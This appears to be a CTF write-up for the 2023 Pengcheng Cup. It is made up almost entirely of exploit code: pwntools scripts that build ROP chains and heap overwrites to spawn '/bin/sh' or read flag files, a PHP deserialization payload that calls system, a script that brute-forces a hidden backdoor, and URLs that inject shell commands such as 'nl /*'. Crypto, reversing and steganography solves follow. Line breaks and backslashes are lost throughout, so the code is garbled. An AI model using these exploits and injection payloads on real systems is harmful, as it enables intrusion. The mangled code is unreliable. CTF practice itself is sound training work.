2023 鹏城杯WP

from pwn import *context.log_level="debug"#p=process("./6502_proccessor")p=remote("172.10.0.7",10002)#gdb.attach(p,"b *$rebase(0x59FA)nb *$rebase(0x5958)")#pause()payload=b""payload+=b"xadx42xdf"#get libcpayload+=b"x69xb0"#add 0x92payload+=b"x8dxf2xde"#write ac to nop_codepayload+=b"xadx43xdf"#get libcpayload+=b"x69xed"#add 0xecpayload+=b"x8dxf3xde"#write ac to nop_codepayload+=b"xadx44xdf"#get libcpayload+=b"x69x01"#add 0xecpayload+=b"x8dxf4xde"#write ac to nop_codepayload+=b"xadx45xdf"#get libcpayload+=b"x8dxf5xde"#write ac to nop_codepayload+=b"xadx46xdf"#get libcpayload+=b"x8dxf6xde"#write ac to nop_codepayload+=b"xadx47xdf"#get libcpayload+=b"x8dxf7xde"#write ac to nop_codepayload+=b"xadx44xdf"#get libcpayload+=b"x69x01"#add 0xecpayload+=b"x8dxf4xde"#write ac to nop_codepayload+=b"xfc"#nopp.recvuntil("length:")p.sendline(str(len(payload)))p.recvuntil("code:")p.send(payload)p.interactive()

from pwn import *from ctypes import *from struct import packbanary = "./silent"elf = ELF(banary)libc = ELF("/home/youlin/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6")#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")ip = '172.10.0.8'port = 9999local = 0if local: io = process(banary)else: io = remote(ip, port)context(log_level = 'debug', os = 'linux', arch = 'amd64')#context(log_level = 'debug', os = 'linux', arch = 'i386')def dbg(): gdb.attach(io) pause()s = lambda data : io.send(data)sl = lambda data : io.sendline(data)sa = lambda text, data : io.sendafter(text, data)sla = lambda text, data : io.sendlineafter(text, data)r = lambda : io.recv()ru = lambda text : io.recvuntil(text)uu32 = lambda : u32(io.recvuntil(b"xff")[-4:].ljust(4, b'x00'))uu64 = lambda : u64(io.recvuntil(b"x7f")[-6:].ljust(8, b"x00"))iuu32 = lambda : int(io.recv(10),16)iuu64 = lambda : int(io.recv(6),16)uheap = lambda : u64(io.recv(6).ljust(8,b'x00'))lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))ia = lambda : io.interactive()# add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; retmagic = 0x00000000004007e8pop_rdi=0x0000000000400963pop_rsi_r15=0x0000000000400961read_plt=elf.plt['read']read_got=elf.got['read']bss=0x000000000601040read_ptr=0x0000000004008DCleave_ret=0x0000000000400876stdout=0x000000000601020csu_1=0x000000000400956csu_2=0x000000000400940pop_rbx_rbp_r12_r13_r14_r15=0x000000000040095Apop_rbp=0x0000000000400788payload=b'A'*0x40+b'A'*8+p64(pop_rbx_rbp_r12_r13_r14_r15)+p64(0xffffffffffc94210)+p64(stdout+0x3d)+p64(0)*4+p64(magic)+p64(pop_rsi_r15)+p64(0x601b10)+p64(0)+p64(read_plt)+p64(pop_rbp)+p64(0x601b10-8)+p64(leave_ret)s(payload)payload1=p64(pop_rbx_rbp_r12_r13_r14_r15)+p64(0)+p64(1)+p64(0x601020)+p64(elf.got['alarm'])+p64(0)*2+p64(csu_2)+p64(pop_rsi_r15)+p64(0x601310)+p64(0)+p64(1)+p64(2)+p64(3)+p64(4)+p64(pop_rbp)+p64(0x601a00+0x40)+p64(read_ptr)+b'./flagx00x00's(payload1)libcbase=uu64()-libc.sym['alarm']lg("libcbase")open=libcbase+libc.sym['open']read=libcbase+libc.sym['read']write=libcbase+libc.sym['write']pop_rsi=0x0000000000023a6a+libcbasepop_rdx=0x0000000000001b96+libcbaseorw=b'A'*0x40+b'A'*8+p64(pop_rdi)+p64(0x601b10 + len(payload1) -8)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(open)orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(elf.bss(0x800))+p64(pop_rdx)+p64(0x100)+p64(read)orw+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(elf.bss(0x800))+p64(pop_rdx)+p64(0x100)+p64(write)io.send(orw)ia()

from pwn import *from ctypes import *from struct import packbanary = "./pwn"elf = ELF(banary)#libc = ELF("./libc.so.6")libc=ELF("/home/youlin/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc.so.6")ip = '172.10.0.9'port = 8888local = 1if local: io = process(banary)else: io = remote(ip, port)context(log_level = 'debug', os = 'linux', arch = 'amd64')#context(log_level = 'debug', os = 'linux', arch = 'i386')def dbg(): gdb.attach(io) pause()s = lambda data : io.send(data)sl = lambda data : io.sendline(data)sa = lambda text, data : io.sendafter(text, data)sla = lambda text, data : io.sendlineafter(text, data)r = lambda : io.recv()ru = lambda text : io.recvuntil(text)uu32 = lambda : u32(io.recvuntil(b"xff")[-4:].ljust(4, b'x00'))uu64 = lambda : u64(io.recvuntil(b"x7f")[-6:].ljust(8, b"x00"))iuu32 = lambda : int(io.recv(10),16)iuu64 = lambda : int(io.recv(6),16)uheap = lambda : u64(io.recv(6).ljust(8,b'x00'))lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))ia = lambda : io.interactive()def cmd(choice):ru(">>>")sl(str(choice))def sell(id,flag=0,content='youlin'):cmd(1)sla('want to buyn', str(id))if flag:sla('add something?Y/Nn', b'Y')sa('need in coffeen', content)else:sla('add something?Y/Nn', b'N')def buy(id, flag=0, content='youlin'):cmd(1)sla('want to buyn', str(id))if flag:sla('add something?Y/Nn', b'Y')sa('need in coffeen', content)else:sla('add something?Y/Nn', b'N')def admin():cmd(4421)sa('admin passwordn', b'just pwn it')def back():cmd(3)def replenish(id):admin()cmd(1)cmd(id)back()def change(id, coffee, content):admin()cmd(2)cmd(id)cmd(coffee)sa('your contentn', content)back()buy(1)buy(1)change(1, 2, p64(0x4062F0))for i in range(7):buy(2)for i in range(7):replenish(2)change(2, 7, p64(0x406068))cmd(1)libc_base = uu64() - libc.sym['atol']lg('libc_base')sla('want to buyn', b'2')sla('add something?Y/Nn', b'N')buy(2)change(2, 2, p64(libc_base + libc.sym['__free_hook'] - 8))for i in range(7):sell(3)for i in range(7):replenish(3)change(3, 7, p64(0) + p64(libc_base + libc.sym['system']))buy(3, 1, b'/bin/sh')ia()

#include <stdint.h>#include <string.h>#include<stdio.h>#include <iostream>#include <cstring>#include <cstdlib>#include <cstdio>#include <cmath>using namespace std;unsigned int burp(unsigned int input){unsigned int v1,v2,v3,v4;v1 = input & 0xff;v2 = (input >> 8) & 0xff;v3= (input >> 16) & 0xff;v4 = (input >> 24) & 0xff;unsigned int v1s, v2s, v3s, v4s;int test = 0;for (int i = 0; i < 256; i++){if (((i * 23 + 0x42)&0xff) == v1){v1s = i;if (test){printf("%d %d", v1s, i);}test = 1;}}test = 0;for (int i = 0; i < 256; i++){if (((i * 23 + 0x42) & 0xff) == v2){v2s = i;if (test){printf("%d %d", v2s, i);}test = 1;}}test = 0;for (int i = 0; i < 256; i++){if (((i * 23 + 0x42) & 0xff) == v3){v3s = i;if (test){printf("%d %d", v3s, i);}test = 1;}}test = 0;for (int i = 0; i < 256; i++){if (((i * 23 + 0x42) & 0xff) == v4){v4s = i;//break;if (test){printf("%d %d", v4s, i);}test = 1;}}unsigned int res = v1s + (v2s << 8) + (v3s << 16) + (v4s << 24);return res;}int main(){srand(0xDEADC0DE);int rand_list[192] = {0x4DF2 ,0x0007125 ,0x003739 ,0x0000000000000DE6,0x0000000000002755 ,0x0000000000007A13 };for (int i = 0; i < 192; i++){rand_list[i] = rand();}unsigned char enc_text[] ={ 0x48, 0x4D, 0x3B, 0xA0, 0x27, 0x31, 0x28, 0x54, 0x6D, 0xF1, 0x21, 0x35, 0x18, 0x73, 0x6A, 0x4C, 0x71, 0x3B, 0xBD, 0x98, 0xB6, 0x5A, 0x77, 0x2D, 0x0B, 0x2B, 0xCB, 0x9B, 0xE4, 0x8A, 0x4C, 0xA9, 0x5C, 0x4F, 0x1B, 0xF1, 0x98, 0x3D, 0x30, 0x59, 0x3F, 0x14, 0xFC, 0x7A, 0xF4, 0x64, 0x02, 0x2B};unsigned char Buf1[] ={ 0x3D, 0x19, 0x1C, 0xA2, 0xAD, 0x10, 0xA5, 0x26, 0x9E, 0x2A, 0xE2, 0xD0, 0x3D, 0x19, 0x1C, 0xA2, 0xAD, 0x10, 0xA5, 0x26, 0x9E, 0x2A, 0xE2, 0xD0, 0x3D, 0x19, 0x1C, 0xA2, 0xAD, 0x10, 0xA5, 0x26, 0x9E, 0x2A, 0xE2, 0xD0, 0x3D, 0x19, 0x1C, 0xA2, 0xAD, 0x10, 0xA5, 0x26, 0x9E, 0x2A, 0xE2, 0xD0};unsigned int* temp = (unsigned int*)enc_text;unsigned int enc[12];for (int i = 0; i < 12; i++){enc[i] = *(temp + i);}for (int i = 0; i < 12; i += 3){unsigned int v6=enc[i];unsigned int v7=enc[i+1];unsigned int v8=enc[i+2];unsigned int v24;unsigned int v25;for (int j = 0; j < 32; j++){v24 = (v6 >> 7) + rand_list[191-1-6*j];v25 = (v6 >> 15) ^ (v6 << 10) | 3;v8 -= (v24 + (rand_list[191 - 6 * j] ^ v25));v24 = (v8 >> 7) + rand_list[191 - 3 - 6 * j];v25 = (v8 >> 15) ^ (v8 << 10) | 3;v7 -= (v24 + (rand_list[191 -2- 6 * j] ^ v25));v24 = (v7 >> 7) + rand_list[191 - 5 - 6 * j];v25 = (v7 >> 15) ^ (v7 << 10) | 3;v6 -= (v24 + (rand_list[191 - 4 - 6 * j] ^ v25));v6 = burp(v6);v7 = burp(v7);v8 = burp(v8);}//EBD30420 98DE 08 F2h/0x98de a8 f2 0x00000000EA34FA00enc[i] = v6;enc[i+1] = v7;enc[i+2] = v8;}char* temp2 = (char*)enc;char flag[48];for (int i = 0; i < 48;i++){flag[i] = temp2[i];}//flag{1CpOVOIeB1d2FcYUvnN1k5PbfMzMNzUzUgV6mB7hXF}}

payload=b""p=open("./encflag.png","rb").read()for i in p: res=(i+0x80)&0xff payload+=res.to_bytes(1,"little")p=open("./test.png","wb").write(payload)#flag{d846b8394630f42e02fef698a4e3df1b}

<?phpclass H{ public $username="admin"; public function __destruct() { $this->welcome(); } public function welcome(){ echo "welcome~ ".$this->username; }}class Hacker{ private $exp; private $cmd; public function __toString() { echo "test"; call_user_func('system', "dir"); } public function __wakeup() { echo "ssss"; }}$array=new H();$array->username=new Hacker();$content=serialize($array);echo ($content);?>

payload: O:1:"H":1:{s:8:"username";O:6:"Hacker":2:{s:11:"Hackerexp";N;s:11:"Hackercmd";N;}}

http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.phpimport re import itertools import requests # 生成所有可能的 16 个十六进制字符的组合 hex_chars = '0123456789abcdef' url = "http://172.10.0.5/" str = "glob://./backdoor_" while 1:  for i in hex_chars:  data = {"filename": str+i+"*"}  res = requests.post(url,data=data).text  print(data)  if "yesyesyes" in res:  print(res)  str += i  else:  continue

1.http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=1xx&title=zz&data=nl /* 2.http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=1xx&title=sh&data=1 3.http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=1xx&title=|*&data=1

N=73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923gift=2223117424030234543005449667053988296724455736030907136592525175314696509716321gift = gift<<250PR.<x> = PolynomialRing(Zmod(N))ok = Falsedef pq_xor(tp,tq,idx): global ok   if ok: return if tp*tq>N: return if (tp+(2<<idx))*(tq+(2<<idx))<N: return  if idx<=250: print(tp) try: f = tp + x  rr = f.monic().small_roots(X=2^250, beta=0.4,epsilon=0.01) if rr != []: print(rr) print(tp) print('p = ',f(rr[0])) ok = True return except: pass  return  idx -=1 b = (gift >>idx)&1  one = 1<<idx  if b==0: pq_xor(tp,tq,idx)  pq_xor(tp+one,tq+one,idx)  else: #1 pq_xor(tp+one,tq,idx) pq_xor(tp,tq+one,idx)#N.nbits()=2048 gift.nbits()=1023 p,q的1024位为1tp = 1<<511tq = 1<<511pq_xor(tp,tq,511)

n =73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923p_ =10833217580503000698385694268032196544400600307706228180481286239545614448110771136511265552720079952935650128918955327972046701926479390396663939251306496p_high = p_ >> 252pbits = 512for i in range(2**4): p4 = p_high<<4  p4 = p4 + i print(p4)  kbits = pbits - p4.nbits() p4 = p4 << kbits R.<x> = PolynomialRing(Zmod(n)) f = x + p4 x1 = f.small_roots(X=2^kbits, beta=0.4, epsilon=0.01) if x1: p = p4 + int(x1[0]) if p.nbits() == 512: print(p) break

import gmpy2from Crypto.Util.number import *n=73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923p =10833217580503000698385694268032196544400600307706228180481286239545614448110770843300361411809086269809006469621399256214887200838529724133384063799751203print(isPrime(p))q = n//pc=71808322808599218331233291542779486534747913572475630198802984648982830332628443972652322590637382696027943799004331488098592525306523343649935216419522329722152742610560398216737030893090641493326477786720839849938277402743820773957184083430369443325368720115515840174745825798187125454448297155036065857691d = gmpy2.invert(65537,(p-1)*(q-1))m = pow(c,d,n)print(long_to_bytes(m))# flag{6eb67115-38b1-4e75-b3fc-de3a9697e565}

foremost bg.jpg

.SNOW.EXE -C -p 'snowday' flag.txtf86361842eb8}

sstv -d flag.wav -o flag.png

eaa2-4d62-ace6-

steghide extract -sf youshouldknowme.jpeg -p 7hR@1nB0w$flag{b921323f-